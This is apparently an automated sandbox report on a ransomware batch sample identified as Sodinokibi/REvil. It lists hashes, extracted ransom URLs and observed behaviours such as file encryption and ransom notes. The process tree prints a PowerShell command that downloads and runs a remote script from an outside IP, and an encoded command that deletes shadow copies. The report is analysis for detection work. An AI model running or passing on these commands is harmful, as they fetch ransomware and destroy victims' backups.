Analysis
-
max time kernel
38s -
max time network
49s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
18-08-2020 22:10
Static task
static1
Behavioral task
behavioral1
Sample
257963fd8d55fc6eb395408d6cd8eb10.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
257963fd8d55fc6eb395408d6cd8eb10.bat
Resource
win10
General
-
Target
257963fd8d55fc6eb395408d6cd8eb10.bat
-
Size
216B
-
MD5
db422fe5e7b4c0a610a166c2521c5b0b
-
SHA1
4df900c107ef17b5d139be2fb8792908a137c1e2
-
SHA256
2b9bf7f85b20bc24437ed489cc2b0c2d4ccf0b13baa34e27568ae61d1f67a31f
-
SHA512
c19beefe11cd9b28d379f33f04061f1a75f52b017cc835997470344c27bb0274a1f555d4f89180183a5168113cd984a682e5db5e1afb5d6fd0eab3e511388f5b
Malware Config
Extracted
http://185.103.242.78/pastes/257963fd8d55fc6eb395408d6cd8eb10
Extracted
C:\w0vf95w-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3738B80C8CFAFDD2
http://decryptor.cc/3738B80C8CFAFDD2
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 272 powershell.exe -
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\StopGroup.tiff powershell.exe File renamed C:\Users\Admin\Pictures\HidePing.tiff => \??\c:\users\admin\pictures\HidePing.tiff.w0vf95w powershell.exe File renamed C:\Users\Admin\Pictures\LimitInvoke.tif => \??\c:\users\admin\pictures\LimitInvoke.tif.w0vf95w powershell.exe File renamed C:\Users\Admin\Pictures\EnterStop.raw => \??\c:\users\admin\pictures\EnterStop.raw.w0vf95w powershell.exe File renamed C:\Users\Admin\Pictures\PublishUnblock.crw => \??\c:\users\admin\pictures\PublishUnblock.crw.w0vf95w powershell.exe File renamed C:\Users\Admin\Pictures\ResetRepair.raw => \??\c:\users\admin\pictures\ResetRepair.raw.w0vf95w powershell.exe File renamed C:\Users\Admin\Pictures\StopGroup.tiff => \??\c:\users\admin\pictures\StopGroup.tiff.w0vf95w powershell.exe File opened for modification \??\c:\users\admin\pictures\DisableExpand.tiff powershell.exe File opened for modification \??\c:\users\admin\pictures\HidePing.tiff powershell.exe File renamed C:\Users\Admin\Pictures\DisableExpand.tiff => \??\c:\users\admin\pictures\DisableExpand.tiff.w0vf95w powershell.exe File renamed C:\Users\Admin\Pictures\EditRepair.png => \??\c:\users\admin\pictures\EditRepair.png.w0vf95w powershell.exe File renamed C:\Users\Admin\Pictures\WatchEnter.raw => \??\c:\users\admin\pictures\WatchEnter.raw.w0vf95w powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8214dbkpdm.bmp" powershell.exe -
Drops file in Program Files directory 25 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\WatchUnblock.inf powershell.exe File opened for modification \??\c:\program files\ConvertToSet.M2V powershell.exe File opened for modification \??\c:\program files\EnterUse.3gp powershell.exe File opened for modification \??\c:\program files\TestShow.rtf powershell.exe File opened for modification \??\c:\program files\TraceComplete.css powershell.exe File created \??\c:\program files\microsoft sql server compact edition\w0vf95w-readme.txt powershell.exe File opened for modification \??\c:\program files\StopSwitch.i64 powershell.exe File opened for modification \??\c:\program files\UnpublishSubmit.ogg powershell.exe File created \??\c:\program files\w0vf95w-readme.txt powershell.exe File opened for modification \??\c:\program files\ConnectConvertFrom.wmf powershell.exe File opened for modification \??\c:\program files\ExportImport.wma powershell.exe File opened for modification \??\c:\program files\ExportTest.mpg powershell.exe File opened for modification \??\c:\program files\UseSelect.ttf powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\w0vf95w-readme.txt powershell.exe File opened for modification \??\c:\program files\GroupPublish.M2V powershell.exe File opened for modification \??\c:\program files\MountRestart.mpv2 powershell.exe File opened for modification \??\c:\program files\StepEnter.php powershell.exe File opened for modification \??\c:\program files\UnlockSet.mpp powershell.exe File opened for modification \??\c:\program files\RequestSearch.mpg powershell.exe File opened for modification \??\c:\program files\SetJoin.avi powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\w0vf95w-readme.txt powershell.exe File created \??\c:\program files (x86)\w0vf95w-readme.txt powershell.exe File opened for modification \??\c:\program files\DisconnectExit.ppt powershell.exe File opened for modification \??\c:\program files\EnterInitialize.mpeg2 powershell.exe File opened for modification \??\c:\program files\PingEdit.ppsx powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 272 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 272 powershell.exe 272 powershell.exe 272 powershell.exe 1888 powershell.exe 1888 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 272 powershell.exe Token: SeDebugPrivilege 272 powershell.exe Token: SeDebugPrivilege 1888 powershell.exe Token: SeBackupPrivilege 1616 vssvc.exe Token: SeRestorePrivilege 1616 vssvc.exe Token: SeAuditPrivilege 1616 vssvc.exe Token: SeTakeOwnershipPrivilege 272 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 992 wrote to memory of 272 992 cmd.exe powershell.exe PID 992 wrote to memory of 272 992 cmd.exe powershell.exe PID 992 wrote to memory of 272 992 cmd.exe powershell.exe PID 992 wrote to memory of 272 992 cmd.exe powershell.exe PID 272 wrote to memory of 1888 272 powershell.exe powershell.exe PID 272 wrote to memory of 1888 272 powershell.exe powershell.exe PID 272 wrote to memory of 1888 272 powershell.exe powershell.exe PID 272 wrote to memory of 1888 272 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\257963fd8d55fc6eb395408d6cd8eb10.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/257963fd8d55fc6eb395408d6cd8eb10');Invoke-CXEMWXSCI;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:272 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1616